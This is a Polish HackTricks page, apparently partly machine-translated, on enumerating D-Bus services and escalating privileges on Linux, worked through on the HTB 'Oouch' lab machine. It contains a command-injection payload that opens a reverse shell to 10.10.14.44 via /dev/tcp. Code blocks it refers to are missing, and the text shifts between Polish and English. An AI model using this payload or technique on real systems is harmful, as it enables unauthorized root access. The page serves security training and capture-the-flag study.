<summary><strong>Dowiedz się, jak hakować AWS od zera do bohatera z</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
D-Bus jest wykorzystywany jako mediator komunikacji międzyprocesowej (IPC) w środowiskach pulpitu Ubuntu. Na Ubuntu obserwuje się równoczesne działanie kilku magistrali komunikacyjnych: magistrala systemowa, głównie wykorzystywana przez **uprzywilejowane usługi do udostępniania usług istotnych dla całego systemu**, oraz magistrala sesji dla każdego zalogowanego użytkownika, udostępniająca usługi istotne tylko dla tego konkretnego użytkownika. Skupiamy się tutaj głównie na magistrali systemowej ze względu na jej powiązanie z usługami działającymi z wyższymi uprawnieniami (np. root), ponieważ naszym celem jest eskalacja uprawnień. Należy zauważyć, że architektura D-Bus wykorzystuje "router" dla każdej magistrali sesji, który jest odpowiedzialny za przekierowywanie wiadomości klientów do odpowiednich usług na podstawie adresu określonego przez klientów dla usługi, z którą chcą się komunikować.
Usługi na D-Bus są definiowane przez **obiekty** i **interfejsy**, które udostępniają. Obiekty można porównać do instancji klas w standardowych językach OOP, przy czym każda instancja jest jednoznacznie identyfikowana przez **ścieżkę obiektu**. Ta ścieżka, podobnie jak ścieżka w systemie plików, jednoznacznie identyfikuje każdy obiekt udostępniany przez usługę. Kluczowym interfejsem w celach badawczych jest interfejs **org.freedesktop.DBus.Introspectable**, który zawiera pojedynczą metodę, Introspect. Ta metoda zwraca reprezentację XML metod, sygnałów i właściwości obsługiwanych przez obiekt, z naciskiem na metody i pominięciem właściwości i sygnałów.
Do komunikacji z interfejsem D-Bus używano dwóch narzędzi: narzędzia wiersza poleceń o nazwie **gdbus** do łatwego wywoływania metod udostępnianych przez D-Bus w skryptach oraz [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), narzędzia GUI opartego na Pythonie, które służy do wyliczania dostępnych usług na każdej magistrali i wyświetlania zawartych w każdej usłudze obiektów.
Na pierwszym obrazku pokazane są usługi zarejestrowane w systemowym magistrali D-Bus, z wyróżnieniem **org.debin.apt** po wybraniu przycisku System Bus. D-Feet zapytuje tę usługę o obiekty, wyświetlając interfejsy, metody, właściwości i sygnały dla wybranych obiektów, jak widać na drugim obrazku. Szczegółowo opisane są również sygnatury każdej metody.
Warto zauważyć, że wyświetlane są również **ID procesu (pid)** i **linia komend** usługi, co jest przydatne do potwierdzenia, czy usługa działa z podwyższonymi uprawnieniami, co jest istotne dla celów badawczych.
**D-Feet umożliwia również wywoływanie metod**: użytkownicy mogą wprowadzać wyrażenia Pythona jako parametry, które D-Feet konwertuje na typy D-Bus przed przekazaniem do usługi.
Należy jednak zauważyć, że **niektóre metody wymagają uwierzytelnienia**, zanim pozwolą nam je wywołać. Zignorujemy te metody, ponieważ naszym celem jest podniesienie uprawnień bez użycia poświadczeń.
Należy również zauważyć, że niektóre usługi zapytują inną usługę D-Bus o nazwie org.freedeskto.PolicyKit1, czy użytkownik powinien mieć uprawnienia do wykonania określonych czynności czy nie.
[Z Wikipedii:](https://pl.wikipedia.org/wiki/D-Bus) Gdy proces ustanawia połączenie z magistralą, magistrala przypisuje temu połączeniu specjalną nazwę magistrali o nazwie _unikatowa nazwa połączenia_. Nazwy magistrali tego typu są niemutowalne - gwarantuje się, że nie zmienią się tak długo, jak istnieje połączenie - i co ważniejsze, nie mogą być ponownie używane podczas trwania magistrali. Oznacza to, że żadne inne połączenie z tej magistrali nigdy nie będzie miało przypisanej takiej unikatowej nazwy połączenia, nawet jeśli ten sam proces zamknie połączenie z magistralą i utworzy nowe. Unikatowe nazwy połączeń są łatwo rozpoznawalne, ponieważ zaczynają się od - w przeciwnym razie zabronionego - znaku dwukropka.
Aby **monitorować****komunikację**, musisz być **rootem**. Jeśli nadal masz problemy z uzyskaniem uprawnień roota, sprawdź [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) i [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus)
Jeśli wiesz, jak skonfigurować plik konfiguracyjny D-Bus, aby **umożliwić nie-rootowym użytkownikom podsłuchiwanie** komunikacji, proszę **skontaktuj się ze mną**!
Zobacz [dokumentację D-Bus](http://dbus.freedesktop.org/doc/dbus-specification.html), aby uzyskać więcej informacji na temat składni reguł dopasowania.
Jako użytkownik **qtc wewnątrz hosta "oouch" z HTB** możesz znaleźć **nieoczekiwany plik konfiguracyjny D-Bus** znajdujący się w _/etc/dbus-1/system.d/htb.oouch.Block.conf_:
Uwaga na poprzednią konfigurację, **musisz być użytkownikiem `root` lub `www-data`, aby wysyłać i odbierać informacje** za pomocą tej komunikacji D-BUS.
Jako użytkownik **qtc** wewnątrz kontenera Docker **aeb4525789d8**, możesz znaleźć pewien kod związany z dbus w pliku _/code/oouch/routes.py._ Oto interesujący kod:
Po drugiej stronie połączenia D-Bus działa skompilowany kod w języku C. Ten kod **nasłuchuje** połączenia D-Bus w celu otrzymania adresu IP i **wywołuje funkcję iptables za pomocą funkcji `system`** w celu zablokowania podanego adresu IP.\
**Wywołanie funkcji `system` jest celowo podatne na wstrzyknięcie poleceń**, więc payload jak poniżej spowoduje utworzenie odwróconego powłoki: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
Na końcu tej strony znajdziesz **kompletny kod C aplikacji D-Bus**. Wewnątrz kodu, między liniami 91-97, znajdziesz informacje o **rejestracji ścieżki obiektu D-Bus** i **nazwie interfejsu**. Te informacje będą niezbędne do wysyłania danych do połączenia D-Bus.
Również, w linii 57 można znaleźć, że **jedyna zarejestrowana metoda** dla tej komunikacji D-Bus nosi nazwę `Block` (_**Dlatego w następnej sekcji ładunki zostaną wysłane do obiektu usługi `htb.oouch.Block`, interfejsu `/htb/oouch/Block` oraz nazwy metody `Block`**_):
Poniższy kod pythonowy wysyła ładunek do połączenia D-Bus do metody `Block` za pomocą `block_iface.Block(runme)` (_zauważ, że został wyodrębniony z poprzedniego fragmentu kodu_):
`busctl` is a command-line tool used to interact with the D-Bus system bus. It allows you to introspect and monitor the bus, as well as send method calls and signals to D-Bus services.
`dbus-send` is another command-line tool that can be used to send messages to D-Bus services. It allows you to specify the destination, interface, object path, and method to be called.
Both `busctl` and `dbus-send` can be used for enumeration and command injection privilege escalation attacks on Linux systems. By exploiting vulnerabilities in D-Bus services, an attacker can gain elevated privileges and execute arbitrary commands on the target system.
*`dbus-send` to narzędzie używane do wysyłania wiadomości do "Message Bus"
* Message Bus - Oprogramowanie używane przez systemy do ułatwienia komunikacji między aplikacjami. Jest związane z Message Queue (wiadomości są uporządkowane sekwencyjnie), ale w Message Bus wiadomości są wysyłane w modelu subskrypcji i są bardzo szybkie.
* Tag "-system" jest używany do oznaczenia, że jest to wiadomość systemowa, a nie wiadomość sesji (domyślnie).
* Tag "-print-reply" jest używany do odpowiedniego wyświetlania naszej wiadomości i odbierania odpowiedzi w czytelnym formacie dla człowieka.
* "-string:" - Typ wiadomości, którą chcemy wysłać do interfejsu. Istnieje kilka formatów wysyłania wiadomości, takich jak double, bytes, booleans, int, objpath. Spośród nich "object path" jest przydatny, gdy chcemy wysłać ścieżkę pliku do interfejsu Dbus. W tym przypadku możemy użyć specjalnego pliku (FIFO), aby przekazać polecenie do interfejsu w postaci nazwy pliku. "string:;" - To jest wywołanie ponowne ścieżki obiektu, gdzie umieszczamy plik FIFO z odwróconym poleceniem powłoki.
_Zauważ, że w `htb.oouch.Block.Block`, pierwsza część (`htb.oouch.Block`) odnosi się do obiektu usługi, a ostatnia część (`.Block`) odnosi się do nazwy metody._
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
